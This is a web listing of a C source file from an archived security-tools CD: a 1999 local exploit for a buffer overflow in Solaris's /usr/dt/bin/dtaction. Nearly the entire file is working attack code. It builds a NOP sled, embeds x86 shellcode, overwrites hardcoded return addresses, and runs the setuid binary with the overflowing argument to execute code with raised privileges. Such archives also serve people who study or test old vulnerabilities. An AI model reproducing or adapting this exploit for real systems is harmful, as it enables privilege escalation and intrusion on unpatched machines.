home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / dtaction.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.2 KB  |  84 lines
  1. /*
  2.  * dtaction_ov.c ( Solaris 7, 2.6, 2.5.1 )
  3.  * Job de Haas
  4.  * (c) ITSX bv 1999
  5.  *
  6.  * This program demonstrates an overflow problem in /usr/dt/bin/dtaction.
  7.  * It has only been tested on Solaris 7 x86
  8.  * assembly code has been taken from ex_dtprintinfo86.c by unewn4th@usa.net
  9.  *
  10.  */
  11.  
  12. #include <stdio.h>
  13.  
  14. #include <stdlib.h>
  15. #include <string.h>
  16. #include <pwd.h>
  17.  
  18. #define BUFLEN 998
  19.  
  20. char exploit_code[] =
  21.   "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  22.   "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  23.   "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  24.   "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  25.   "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
  26.   "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
  27.   "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
  28.   "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
  29.   "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
  30.   "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/id";
  31.  
  32. main()
  33. {
  34.   char *argp[6], *envp[3];
  35.   char buf[2048];
  36.   unsigned long *p;
  37.   struct passwd *pw;
  38.   int buflen;
  39.  
  40.   if ((pw = getpwuid(getuid())) == NULL)
  41.     {
  42.       perror("getpwuid");
  43.       exit(1);
  44.     }
  45.  
  46.   buflen = BUFLEN - strlen( pw->pw_name );
  47.  
  48.   memset(buf,0x90,buflen);
  49.  
  50.   strncpy( &buf[500], exploit_code, strlen(exploit_code));
  51.  
  52.   /* set some pointers to values that keep code running */
  53.   p = (unsigned long *)&buf[buflen];
  54.   *p++ = 0x37dc779b;
  55.   *p++ = 0xdfaf6502;
  56.   *p++ = 0x08051230;
  57.   *p++ = 0x080479b8;
  58.  
  59.   /* the return address. */
  60.   *p++ = 0x08047710;
  61.   *p = 0;
  62.  
  63.   argp[0] = strdup("/usr/dt/bin/dtaction");
  64.   argp[1] = strdup("-u");
  65.   argp[2] = strdup(buf);
  66.   argp[3] = strdup("Run");
  67.   argp[4] = strdup("/usr/bin/id");
  68.   argp[5] = NULL;
  69.  
  70.   if (!getenv("DISPLAY"))
  71.     {
  72.       printf("forgot to set DISPLAY\n");
  73.       exit(1);
  74.     }
  75.  
  76.   envp[0] = malloc( strlen("DISPLAY=")+strlen(getenv("DISPLAY"))+1);
  77.   strcpy(envp[0],"DISPLAY=");
  78.   strcat(envp[0],getenv("DISPLAY"));
  79.   envp[1] = NULL;
  80.  
  81.   execve("/usr/dt/bin/dtaction",argp,envp);
  82.  
  83. }
  84. /*                    www.hack.co.za              [2000]*/